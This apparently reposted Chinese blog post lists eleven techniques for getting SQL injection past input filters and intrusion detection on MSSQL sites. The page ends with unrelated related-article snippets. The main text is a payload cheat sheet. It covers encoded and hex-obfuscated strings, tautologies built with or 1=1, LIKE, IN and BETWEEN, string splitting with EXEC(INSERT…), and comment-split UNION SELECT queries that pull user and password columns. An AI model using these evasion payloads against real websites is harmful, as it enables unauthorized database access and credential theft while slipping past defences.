网站检测之防注入绕过的十一种技巧

news/2024/5/9 16:29:38/文章来源:https://blog.csdn.net/weixin_34226706/article/details/91965609

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

1、运用编码技术绕过

如URLEncode编码,ASCII编码绕过。
 
例如or 1=1即
%6f%72%20%31%3d%31
 
而Test也可以为
 
CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
 
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
or'' swords'' =‘swords'',由于mssql的松散性,我们可以把or ''swords'' 之间的空格去掉,并不影响运行。
 
3、运用字符串判断代替
用经典的or 1=1判断绕过,

 
or ''swords'' =''swords''
 
这个方法就是网上在讨论的。
 
4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,

 
or ''swords'' = N'' swords''
 
,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
 
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如
 
or ''swords'' =‘sw'' +'' ords'' ;EXEC(‘IN'' +'' SERT INTO ''+'' …..'' )
 
6、通过LIKE绕过
以前怎么就没想到呢?

 
or''swords'' LIKE ''sw''
 
显然可以很轻松的绕过“=”“>”的限制……
 
7、通过IN绕过
与上面的LIKE的思路差不多,

 
or ''swords'' IN (''swords'')
 
 
8、通过BETWEEN绕过

 
or ''swords'' BETWEEN ''rw'' AND ''tw''
 
9、通过>或者<绕过
 
or ''swords'' > ''sw''
or ''swords'' < ''tw''
or 1<3
……
 
10、运用注释语句绕过
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
 
11、用HEX绕过,一般的IDS都无法检测出来
 
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

转载于:https://my.oschina.net/richardx/blog/55138

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_748437.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

行业分析常用到的21个网站

行业分析常用到的21个网站 前言 今天写《就业乱世&#xff0c;如何正面应战&#xff01;【所长】》笔记的时候在里面找到了作者分析行业常用到的21个网站。于是我也看一看。还是有不少启发的。让我一目了然知道对哪些公司看哪些数据。我之前接触得迷迷糊糊的&#xff0c;知道…

静态博客网站——vuepress功能进化

vuepress进化史 前言 昨天回顾笔记的时候。想起了我一个月前的尝试的vuepress&#xff0c;之前因为部署没成功&#xff0c;没找到原因就闲置了一下。昨天心血来潮&#xff0c;研究了一下。没想到一下子就解决了。 真的是黎明前最黑暗&#xff0c;离成功就差一步。但是也正如人…

一个把html控件封装的很好的网站bootstrap

最近一直忙于写前台代码突然发现twitter提供了一个开源的工具里面提供了一些非常好的css文件和jquery文件&#xff0c;嘿嘿&#xff0c;现在拿出来分享一下&#xff0c;下面来讲具体应用在MVC的操作 1、先把bootstrap的包下载下来 地址是http://twitter.github.com/bootstrap/&…

商业分析的50个网站和分析方法

商业分析的50个网站和分析方法 前言 今天看到一个内容&#xff0c;感觉还可以&#xff0c;干货多。 摘要 一个questmobile&#xff0c;一个买购网。用来看互联网的研报以及看行业龙头企业。 摘要 下次了解企业的时候&#xff0c;先用爱企查查公司的财务情况&#xff1b;然后用…

查论文的网站

查论文的网站 前言 今天看知乎的时候看到一个内容&#xff0c;感觉不错&#xff0c;对我有用。记录一下。 《你写论文时发现了哪些非常神的网站&#xff1f;》 用网页打开知乎的时候如果弹出登录弹窗&#xff0c;且不能叉掉&#xff0c;可以先刷新一下&#xff0c;然后不断按…

解决访问github等网站慢或下载失败的问题

最近老大push项目&#xff0c;正常的git clone每次都是下载一部分就断掉了。下面介绍网上找到的两种方法&#xff1a; 方法一&#xff1a; 1.打开网站https://www.ipaddress.com/ &#xff1b; 2.分别在上面打开的网站中查找github.com和github.global.ssl.fastly.net的IP地址&…

ASP.NET 中得到网站绝对路径的几种方法

转载于:https://www.cnblogs.com/weapon/archive/2013/01/19/2867235.html

自定义SharePoint新网站创建过程 (二)

首先澄清一个概念。在一个SharePoint网站的网站设置页面中&#xff0c;使用“将网站另存为模板”链接&#xff0c;管理员可以将整个网站保存为一个扩展名为.stp格式的模板。使用这个stp网站模板&#xff0c;管理员可以重复创建同样结构&#xff08;和内容&#xff09;的新网站。…

VC2005从开发MFC ActiveX ocx控件到发布到.net网站的全部过程

开篇语&#xff1a;最近在弄ocx控件发布到asp.net网站上使用&#xff0c;就是用户在使用过程中&#xff0c;自动下载安装ocx控件。&#xff08;此文章也是总结了网上好多人写的文章&#xff0c;我只是汇总一下&#xff0c;加上部分自己的东西&#xff0c;在这里感谢所有在网上发…

[方法篇](禁止YisouSpider|EasouSpider|EtaoSpider)搜索引擎蜘蛛给网站带来的危害,有效指引爬虫对应的措施...

搜索引擎蜘蛛给网站带来的危害&#xff0c;有效指引爬虫对应的措施[方法篇](禁止YisouSpider|EasouSpider|EtaoSpider)上一遍文章《搜索引擎蜘蛛给网站带来的危害&#xff0c;有效指引爬虫对应的措施(最准确搜索引擎蜘蛛名称)》下一篇“如何更高效发现&屏蔽搜索引擎蜘蛛”实…

以电商网站为例,谈大型分布式架构设计与优化

本文大纲&#xff1a; 1. 使用电商案例的原因 2. 电商网站需求 3. 网站初级架构 4. 系统容量估算 5. 网站架构分析 6. 网站架构优化 本文主题为电商网站架构案例&#xff0c;将介绍如何从电商网站的需求&#xff0c;到单机架构&#xff0c;逐步演变为常用的、可供参考的分布式架…

table改网站框的大小

table 当网站出现这样上下不一样宽的时候 修改的时候要修改最外部的table 修改完后效果转载于:https://blog.51cto.com/hmlwl/1398906

Windows Azure系列 -《基础篇》- 创建并发布网站

打开Windows Azure管理门户&#xff0c;点击左侧边栏网站标签&#xff0c;然后点击“创建网站”按钮&#xff1a;在接下来的配置页面输入预想的URL&#xff0c;并选择宿主计划和服务所在位置&#xff1a;点击“创建网站”按钮后就会马上进行创建&#xff0c;很快完成创建并运行…

C++使用libCurl访问12306网站实现登录查询车次信息

作为学习libcurl的小作业&#xff0c; 使用libcurl访问12306&#xff0c;成功获取验证码&#xff0c;目前不能自动识别&#xff0c;需要手动输入&#xff1a;

网站分布式架构

原文&#xff1a;http://xubaoguo.iteye.com/blog/1882030 摘要: 互联网的网站和大部分企业管理软件一样都是使用B/S架构模型&#xff0c;但是大型的公共网站B/S架构会更加复杂&#xff0c;对架构人员的要求更高&#xff0c;今天我想在自己博客里聊聊我设计的网站的B/S技术架构…

网站死链接检测查询工具

网站死链接检测查询工具 什么是网站死链接&#xff1a;死链接就是指网站的链接不能正常被访问&#xff0c;如A页面上面有一个B页面的链接&#xff0c;现在通过A页面的链接访问B页面&#xff0c;可是B页面已经删除或者转移&#xff0c;现在通过A页面的链接访问到B页面并没有出现…

推荐一个很好的看技术书籍的网站,也可以自己写书

2019独角兽企业重金招聘Python工程师标准>>> 1. 网站&#xff1a;https://love2.io 2. 各种技术书籍都有&#xff0c;很多都是技术大牛写的、总结的&#xff0c;也能自己把在gitHub上写的markdown整理而成的书籍上传上去共享出来。 转载于:https://my.oschina.net/u…

Java Web开发: 基于HttpServlet的用户登录网站 实例

一个简单的小例子&#xff0c;基于httpservlet的用户登录&#xff08;杂家是菜鸟刚接触javaee&#xff0c;只能从最简单出发了&#xff09;&#xff0c;首先看业务逻辑&#xff1a; 有三个文件组成&#xff0c;分别是登录、验证和欢迎界面。要达到的目标是&#xff1a; 下图是H…

你的网站会投放这样的广告么?

我震惊了&#xff0c;钱要赚&#xff0c;但为了公司名誉以及社会影响&#xff0c;就算是广告&#xff0c;能不能有个底线的啊&#xff1f;

怎么修复网站漏洞 骑士cms的漏洞修复方案

骑士CMS是国内公司开发的一套开源人才网站系统&#xff0c;使用PHP语言开发以及mysql数据库的架构&#xff0c;2019年1月份被某安全组织检测出漏洞&#xff0c;目前最新版本4.2存在高危网站漏洞&#xff0c;通杀SQL注入漏洞&#xff0c;利用该网站漏洞可以获取网站的管理员账号…